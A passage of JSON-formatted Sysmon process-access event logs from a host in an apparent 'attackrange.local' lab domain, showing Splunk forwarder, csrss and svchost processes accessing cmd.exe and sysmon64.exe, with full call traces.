--scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3646,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-0010256A0500}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-0010256A0500}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3647,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-0010256A0500}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-0010256A0500}","TargetProcessId":"4848","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3648,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3649,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3650,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3651,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3652,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3653,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.733\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.733","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 